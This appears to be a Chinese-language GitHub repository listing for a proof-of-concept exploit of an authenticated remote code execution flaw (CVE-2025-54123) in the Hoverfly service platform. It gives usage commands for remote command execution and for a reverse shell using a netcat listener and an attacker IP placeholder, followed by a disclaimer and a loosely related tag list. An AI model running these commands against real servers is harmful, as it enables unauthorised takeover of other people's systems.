davidzzo23/CVE-2025-54123

GitHub: davidzzo23/CVE-2025-54123

针对 Hoverfly 服务模拟平台的认证后远程代码执行漏洞(CVE-2025-54123)的 PoC 利用脚本,支持命令执行与反弹 Shell。

Stars: 0 | Forks: 0

# CVE-2025-54123 Hoverfly CVE 远程代码执行 (RCE) ## 使用方法 命令执行: ``` python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami ``` 反弹 Shell: ``` nc -lvnp 443 ``` ``` python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443 ``` ## 免责声明 此脚本仅用于教育目的。未经授权在未获许可的系统上使用此漏洞利用程序是违法行为。作者对因使用此漏洞程序而导致的任何滥用或损害不承担任何责任。
标签:CISA项目, CVE, CVE-2025-54123, Hoverfly, Maven, PoC, Python, RCE, 反弹Shell, 命令执行, 安全测试, 攻击性安全, 数字签名, 数据展示, 无后门, 暴力破解, 漏洞验证, 红队, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护